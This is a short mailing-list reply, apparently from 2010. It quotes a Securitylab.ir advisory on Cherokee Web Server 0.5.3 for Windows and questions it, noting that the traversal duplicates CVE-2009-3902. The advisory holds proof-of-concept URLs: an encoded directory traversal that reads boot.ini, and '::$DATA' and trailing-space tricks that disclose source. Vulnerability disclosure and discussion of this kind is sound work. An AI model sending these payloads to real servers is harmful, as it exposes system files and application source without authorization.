On Sat, 12 Jun 2010, info@xxxxxxxxxxxxxx wrote: : ################################################################# : # Securitylab.ir : ################################################################# : # Application Info: : # Name: Cherokee Web Server : # Version: 0.5.3 : # Download: http://mirror.aarnet.edu.au/pub/cherokee/windows/Cherokee-setup-0.5.3.exe : ################################################################# : [Directory Traversal]: : http://127.0.0.1/%5C../%5C../%5C../boot.ini%20 This is essentially CVE-2009-3902, just encoding one char. : [Remote Source Disclosure]: : http://127.0.0.1:80/file.html::$DATA : : http://127.0.0.1/index.htm%20 Did you try these on something other than HTML? Did it work for .php or .asp for example?
